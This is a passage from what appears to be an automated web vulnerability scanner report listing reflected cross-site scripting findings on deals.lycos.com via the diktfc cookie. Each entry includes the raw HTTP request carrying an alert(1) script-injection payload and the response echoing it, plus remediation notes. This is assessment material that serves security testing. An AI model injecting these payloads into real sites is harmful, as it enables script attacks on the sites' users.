This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/automotive-238 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A25659"><script>alert(1)</script>669e5c4d6cc; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:57 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/automotive-238&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A25659"><script>alert(1)</script>669e5c4d6cc&amp;cj=1" alt="tracker" />
...[SNIP]...

1.256. http://deals.lycos.com/deals/category/automotive-238 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/automotive-238

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b2d5"%3balert(1)//27c5d3438ff was submitted in the diktfc cookie. This input was echoed as 5b2d5";alert(1)//27c5d3438ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/automotive-238 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5b2d5"%3balert(1)//27c5d3438ff; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:59 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ipt type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/automotive-238",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5b2d5";alert(1)//27c5d3438ff"
});
</script>
...[SNIP]...

1.257. http://deals.lycos.com/deals/category/babies-and-kids-224 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/babies-and-kids-224

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 930d9"%3balert(1)//408e2508bec was submitted in the diktfc cookie. This input was echoed as 930d9";alert(1)//408e2508bec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/babies-and-kids-224 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A930d9"%3balert(1)//408e2508bec; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35854

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ype="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/babies-and-kids-224",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A930d9";alert(1)//408e2508bec"
});
</script>
...[SNIP]...

1.258. http://deals.lycos.com/deals/category/babies-and-kids-224 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/babies-and-kids-224

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74795"><script>alert(1)</script>8fa74226461 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/babies-and-kids-224 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A74795"><script>alert(1)</script>8fa74226461; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/babies-and-kids-224&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A74795"><script>alert(1)</script>8fa74226461&amp;cj=1" alt="tracker" />
...[SNIP]...

1.259. http://deals.lycos.com/deals/category/cameras-167 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/cameras-167

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8de9"><script>alert(1)</script>ca62e0e2bb6 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/cameras-167 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab8de9"><script>alert(1)</script>ca62e0e2bb6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:52 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47449

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/cameras-167&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab8de9"><script>alert(1)</script>ca62e0e2bb6&amp;cj=1" alt="tracker" />
...[SNIP]...

1.260. http://deals.lycos.com/deals/category/cameras-167 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/cameras-167

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8b3d"%3balert(1)//270e9be217c was submitted in the diktfc cookie. This input was echoed as e8b3d";alert(1)//270e9be217c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/cameras-167 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae8b3d"%3balert(1)//270e9be217c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/cameras-167",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ae8b3d";alert(1)//270e9be217c"
});
</script>
...[SNIP]...

1.261. http://deals.lycos.com/deals/category/cell-phones-174 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/cell-phones-174

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b2e8"%3balert(1)//ec00ddd9290 was submitted in the diktfc cookie. This input was echoed as 2b2e8";alert(1)//ec00ddd9290 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/cell-phones-174 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2b2e8"%3balert(1)//ec00ddd9290; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:55 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42236

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/cell-phones-174",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2b2e8";alert(1)//ec00ddd9290"
});
</script>
...[SNIP]...

1.262. http://deals.lycos.com/deals/category/cell-phones-174 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/cell-phones-174

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfd7d"><script>alert(1)</script>0b7224d164c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/cell-phones-174 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abfd7d"><script>alert(1)</script>0b7224d164c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:54 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/cell-phones-174&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abfd7d"><script>alert(1)</script>0b7224d164c&amp;cj=1" alt="tracker" />
...[SNIP]...

1.263. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/clothing-and-accessories-202

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52676"><script>alert(1)</script>35e6603099d was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/clothing-and-accessories-202 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A52676"><script>alert(1)</script>35e6603099d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:56 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/clothing-and-accessories-202&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A52676"><script>alert(1)</script>35e6603099d&amp;cj=1" alt="tracker" />
...[SNIP]...

1.264. http://deals.lycos.com/deals/category/clothing-and-accessories-202 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/clothing-and-accessories-202

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3b23"%3balert(1)//cf9f07eb831 was submitted in the diktfc cookie. This input was echoed as b3b23";alert(1)//cf9f07eb831 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/clothing-and-accessories-202 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3b23"%3balert(1)//cf9f07eb831; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/clothing-and-accessories-202",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3b23";alert(1)//cf9f07eb831"
});
</script>
...[SNIP]...

1.265. http://deals.lycos.com/deals/category/computer-39 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/computer-39

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcb82"><script>alert(1)</script>9d654d77a5c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/computer-39 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abcb82"><script>alert(1)</script>9d654d77a5c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/computer-39&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Abcb82"><script>alert(1)</script>9d654d77a5c&amp;cj=1" alt="tracker" />
...[SNIP]...

1.266. http://deals.lycos.com/deals/category/computer-39 [diktfc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/computer-39

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 409c8"%3balert(1)//11fafd7bd7d was submitted in the diktfc cookie. This input was echoed as 409c8";alert(1)//11fafd7bd7d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/computer-39 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
